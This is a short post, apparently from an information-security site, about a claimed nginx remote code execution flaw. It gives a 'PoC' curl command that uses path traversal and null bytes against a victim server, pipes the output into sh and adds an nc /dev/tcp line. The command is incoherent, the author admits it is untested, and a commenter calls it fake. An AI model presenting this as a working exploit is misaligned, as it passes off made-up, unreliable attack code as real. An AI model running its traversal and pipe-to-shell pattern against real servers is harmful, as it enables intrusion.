NGINX RCE - Information Security


https://github.com/nginx/njs/issues/159

https://twitter.com/alisaesage/status/1134400951043874816

https://twitter.com/notdan/status/1134559331989434368

The PoC method:

curl -gsS \
https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \
<'protocol:TCP' -O 0x0238f06a#PLToffset | \
sh; nc /dev/tcp/localhost


Completely untested, but upgrading nginx first is the right thing to do.

--

All Comments

Mary 2019-06-02
Someone has come forward saying the PoC is fake.